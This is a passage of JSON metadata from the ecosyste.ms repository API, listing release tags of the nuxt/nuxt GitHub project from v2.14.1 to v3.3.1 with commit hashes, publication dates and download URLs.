ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repo